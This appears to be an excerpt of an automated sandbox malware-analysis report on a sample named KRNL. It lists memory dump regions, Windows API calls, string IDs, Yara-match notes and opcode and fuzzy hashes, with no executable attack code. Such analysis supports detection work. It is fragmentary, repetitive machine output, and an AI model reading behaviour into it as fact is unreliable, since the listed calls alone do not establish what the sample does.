• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
• String ID:
• API String ID: 1088826258-0
APIs
Strings
Similarity
• API ID: _strlen
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 4218353326-1866435925
APIs
• Concurrency::details::_Release_chore.LIBCPMT ref: 006E7526
• ___std_exception_copy.LIBVCRUNTIME ref: 006E7561
  • Part of subcall function 006EAF37: CreateThreadpoolWork.KERNEL32(006EB060,006E8A2A,00000000), ref: 006EAF46
  • Part of subcall function 006EAF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 006EAF53
Strings
Similarity
• API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
• String ID: Fail to schedule the chore!$G.q
• API String ID: 3683891980-4289182727
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 006E3EC6
• std::_Lockit::~_Lockit.LIBCPMT ref: 006E4002
  • Part of subcall function 006EABC5: _Yarn.LIBCPMT ref: 006EABE5
  • Part of subcall function 006EABC5: _Yarn.LIBCPMT ref: 006EAC09
Strings
Similarity
• API ID: LockitYarnstd::_$Lockit::_Lockit::~_
• String ID: bad locale name$|=ne.q
• API String ID: 2070049627-3641304814
APIs
• std::_Ref_count_base::_Decref.LIBCPMT ref: 006EB809
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: DecrefRef_count_base::_std::_
• String ID: MOC$RCC$csm
• API String ID: 1456557076-2671469338
APIs
• WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,006E253A,?,?,00000000), ref: 006EF129
• GetExitCodeThread.KERNEL32(?,00000000,?,?,006E253A,?,?,00000000), ref: 006EF142
• CloseHandle.KERNEL32(?,?,?,006E253A,?,?,00000000), ref: 006EF154
Strings
Similarity
• API ID: CloseCodeExitHandleObjectSingleThreadWait
• String ID: :%n
• API String ID: 2551024706-2487494124
APIs
Strings
Similarity
• API ID: Yarn
• String ID: e.q$|=ne.q
• API String ID: 1767336200-1506673154
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,007069DC,00000000,?,0071D2B0,?,?,?,00706913,00000004,InitializeCriticalSectionEx,00710D34,00710D3C), ref: 0070694D
• GetLastError.KERNEL32(?,007069DC,00000000,?,0071D2B0,?,?,?,00706913,00000004,InitializeCriticalSectionEx,00710D34,00710D3C,00000000,?,006FBBBC), ref: 00706957
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0070697F
Strings
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
APIs
• GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00704001
  • Part of subcall function 006FC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006FD895,?,00000000,-00000008), ref: 006FC082
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00704253
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00704299
• GetLastError.KERNEL32 ref: 0070433C
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
                                                                                                                                                                                                                                                          • Opcode ID: 4abc43949758727193f159d1e01ee19cd4f9fb3766aba155f10c7fa64e59a81c
                                                                                                                                                                                                                                                          • Instruction ID: 63b9e8cb4f49cefcc034a0c9f177bb6423c7d55d8751590667e79805d36a2608
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4abc43949758727193f159d1e01ee19cd4f9fb3766aba155f10c7fa64e59a81c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2D149B5E00258DFCF15CFA8C880AEDBBF5FF49314F14826AEA55EB291D634A941CB50
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                                          • Opcode ID: 933bfbe9267bb8dff0de8dec6a5d9246f1a581e5e1749ecf2683fc8c2fd93f91
                                                                                                                                                                                                                                                          • Instruction ID: 2d4179a66163b8028f5c1bd9e23ea5f88f828f1c7e0d9d398d6c6a674270c05f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 933bfbe9267bb8dff0de8dec6a5d9246f1a581e5e1749ecf2683fc8c2fd93f91
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D51D17364570AEFEB299F54C991BBA73A6EF40710F14502DEA0647291D731ED81CB90
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006E72C5
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E7395
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E73A3
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E73B1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2261580123-0
                                                                                                                                                                                                                                                          • Opcode ID: d84bc1c333bb0172b5a0cd114a46298ccf83f6ddcf1c56f96832921084f59115
                                                                                                                                                                                                                                                          • Instruction ID: 018311f600b65332b7589c60e7806c97970d9d203e802bfd0f58c2778fd51256
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d84bc1c333bb0172b5a0cd114a46298ccf83f6ddcf1c56f96832921084f59115
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 074124B1901385CBDB60DB26C8417AFB7A6BF44320F14463DD81647791EB30E805CBD1
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006FD895,?,00000000,-00000008), ref: 006FC082
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00701E2A
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00701E31
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00701E6B
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00701E72
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1913693674-0
                                                                                                                                                                                                                                                          • Opcode ID: f25dd0b7842dcf2fe754ff34bcddd8b0e39dee47ec876785c1dcb25568371d70
                                                                                                                                                                                                                                                          • Instruction ID: e32ca57ab662ea4217ef8587730b4fae0062c38fe3cdb8637493012fbabafb19
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f25dd0b7842dcf2fe754ff34bcddd8b0e39dee47ec876785c1dcb25568371d70
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40219D71604219EFDB20AFA5C88187BB7E9FF003657908619FD19D7591E739EC008BA0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0254ae2127c9291d93c81fa772fb1481ddc97cceaf94a03920bc899282885eac
                                                                                                                                                                                                                                                          • Instruction ID: 743c1983a16e57fbd28b97eda628ff8145e1233a7b2fd939840e73b99f349af9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0254ae2127c9291d93c81fa772fb1481ddc97cceaf94a03920bc899282885eac
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0021C27120420FAF8B60AF698CE19BA776BFF403647118518FB59D7250EB31EC41CBA4
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 007031C6
                                                                                                                                                                                                                                                            • Part of subcall function 006FC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006FD895,?,00000000,-00000008), ref: 006FC082
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007031FE
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0070321E
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• String ID:
• API String ID: 158306478-0
• Opcode ID: 9e10e4241ecd073afe2940b235d17e5430b8760ebbfa7df8aaa74088f5458d20
• Instruction ID: a9086f0b60c8ade8bd266190ba8c979d4e71fcc7c679fa586c044d0fce26910a
• Opcode Fuzzy Hash: 9e10e4241ecd073afe2940b235d17e5430b8760ebbfa7df8aaa74088f5458d20
• Instruction Fuzzy Hash: 1E11D6B1501119FEE7112BB5AC8ACFF6A9DEEC97947104219FA01D1181FF78EF0141B5
APIs
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000), ref: 0070ADB7
• GetLastError.KERNEL32(?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000,?,?,?,00703CD6,00000000), ref: 0070ADC3
  • Part of subcall function 0070AE20: CloseHandle.KERNEL32(FFFFFFFE,0070ADD3,?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000,?,?), ref: 0070AE30
• ___initconout.LIBCMT ref: 0070ADD3
  • Part of subcall function 0070ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0070AD91,0070A2DC,?,?,00704390,?,00000000,00000000,?), ref: 0070AE08
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0070A2EF,00000000,00000001,00000000,?,?,00704390,?,00000000,00000000,?), ref: 0070ADE8
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
• Opcode ID: bf7924cf076a20245278e2d3a7418fe119e6b7ec593cca223ee7bda0efa26c35
• Instruction ID: 54fb4119b60394895a47349dd540aa8b5fabbcf1881a54a8a71d65eaf9f8c03a
• Opcode Fuzzy Hash: bf7924cf076a20245278e2d3a7418fe119e6b7ec593cca223ee7bda0efa26c35
• Instruction Fuzzy Hash: ADF01236600229FBCF221FD9EC089DA3F66FF047A1F00C111FE08851A4D73AC8609B95
APIs
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 006F0507
• GetCurrentThreadId.KERNEL32 ref: 006F0516
• GetCurrentProcessId.KERNEL32 ref: 006F051F
• QueryPerformanceCounter.KERNEL32(?), ref: 006F052C
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: aae8c9efb57ef37206f0982b3e69251400d5376f8765ff8d906e2a822d65b356
• Instruction ID: 624c8c8d1f7abbc2243d2be23e1d6b62d8ad55043a06f7365ffe7eb9ae28115f
• Opcode Fuzzy Hash: aae8c9efb57ef37206f0982b3e69251400d5376f8765ff8d906e2a822d65b356
• Instruction Fuzzy Hash: 48F05F74D1120DEBCB00DFB8DA499DEBBF4FF1C200B918995A452E6150EA34AB44DB54
APIs
• EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,006FB893,?,?,00000000,00000000,00000000,?), ref: 006FB9B7
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: d195aa015f2ac5999505b50b75eca91b8d5512be5ff925cc25aa777128af3bd6
• Instruction ID: 8b49dbc0d829e7cd1ab3b9344a7dec2ba2566e6f805eba058c645a48167d4bfa
• Opcode Fuzzy Hash: d195aa015f2ac5999505b50b75eca91b8d5512be5ff925cc25aa777128af3bd6
• Instruction Fuzzy Hash: 4241347290020DAFCF15DF98CC81AEEBBB6FF48300F189199FA14A7222D3759950DB91
APIs
• ___except_validate_context_record.LIBVCRUNTIME ref: 006FB475
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: ___except_validate_context_record
• String ID: csm$csm
• API String ID: 3493665558-3733052814
• Opcode ID: 7232b2c04a180d64e1580780f949a13be7a56bad945d3ea80631022a9ce787bf
• Instruction ID: 6e1dd83ed214097eb2670d2ff6bff18461d0fc674b79f14ba522985c299029a0
• Opcode Fuzzy Hash: 7232b2c04a180d64e1580780f949a13be7a56bad945d3ea80631022a9ce787bf
• Instruction Fuzzy Hash: B431D57250021DEBCF269F90CD448FE7B67FF09315B18965AFA544A222C33ADD61DB81
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: a7e015fa189f20fae8a1e1574193bbbed12d41f97909a9eee6515be2d05f634e
                                                                                                                                                                                                                                                          • Instruction ID: d2e9c7bdcd16e3a15224797572231dfe0fa3dd802bd302cf10fb2ba368259f32
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7e015fa189f20fae8a1e1574193bbbed12d41f97909a9eee6515be2d05f634e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 723192B49143148FDB00EF68DA85649BBF4BF89304F41852EE898DB360D3B4A958CF86
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006EB8B9
                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(?,?,?,?,?), ref: 006EB8DE
                                                                                                                                                                                                                                                            • Part of subcall function 006F060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,006EF354,00000000,?,?,?,006EF354,006E3D4A,0071759C,006E3D4A), ref: 006F066D
                                                                                                                                                                                                                                                            • Part of subcall function 006F8353: IsProcessorFeaturePresent.KERNEL32(00000017,006F378B,?,?,?,?,00000000,?,?,?,006EB5AC,006EB4E0,00000000,?,?,006EB4E0), ref: 006F836F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                          • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                          • Opcode ID: 37d591f8fb25c0d92a28ef4671773d1f64bf988a8bd3bf26604fa5e76cad3060
                                                                                                                                                                                                                                                          • Instruction ID: c3957d0d1d5e4f673619f74532783bb5e4c57914bfb5cba4ce5e8a39211888e7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37d591f8fb25c0d92a28ef4671773d1f64bf988a8bd3bf26604fa5e76cad3060
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD215531E02358EBCF249F9AD945AEFB7BAAF54710F14540AE405AB350CB70AD458B81
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 006E2673
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                          • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                          • API String ID: 2659868963-1158432155
                                                                                                                                                                                                                                                          • Opcode ID: 89d66d885912260380967a078e3b07906f62e34dfe759b5ebeff4c6e92a05c79
                                                                                                                                                                                                                                                          • Instruction ID: a495ef1df2cbff79822e63290eb82af11f077fea2c9069ed9ed00fe9c6958118
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89d66d885912260380967a078e3b07906f62e34dfe759b5ebeff4c6e92a05c79
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F01DFF1609305EBDB14DF28D856A6B7BE9AF08318F11892CF45D8B381D379E848CB85
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006F060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,006EF354,00000000,?,?,?,006EF354,006E3D4A,0071759C,006E3D4A), ref: 006F066D
                                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 006E2673
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
